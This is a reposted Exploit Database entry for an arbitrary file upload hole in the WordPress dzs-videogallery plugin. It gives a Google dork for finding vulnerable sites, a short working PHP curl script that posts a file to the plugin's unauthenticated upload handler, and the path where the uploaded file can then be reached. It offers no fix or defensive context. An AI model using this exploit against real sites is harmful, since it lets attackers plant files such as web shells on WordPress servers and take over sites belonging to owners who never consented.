WordPress Plugin dzs-videogallery – Arbitrary File Upload

• Exploit Database
• 11 阅读

• 作者： link_satisi
  日期： 2013-11-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/29834/

• ###################################################################################################
  # Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
  # Author: iskorpitx
  # Date: 22/11/2013
  # Vendor Homepage: http://digitalzoomstudio.net
  # Themes Link: http://digitalzoomstudio.net/docs/wpvideogallery/
  # Infected File: upload.php
  # Category: webapps
  # Google dork:inurl:/wp-content/plugins/dzs-videogallery/
  # Tested on : Windows/Linux
  ###################################################################################################
  
  <?php 
  $uploadfile=""; 
  $ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php"); 
  curl_setopt($ch, CURLOPT_POST, true); 
  curl_setopt($ch, CURLOPT_POSTFIELDS,
  array('file_field'=>"@$uploadfile")); 
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
  $postResult = curl_exec($ch); curl_close($ch); 
  print "$postResult"; 
  ?>
  
  http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/upload.html
  
  
  _________________________________
  
  All http://www.mavi1.org members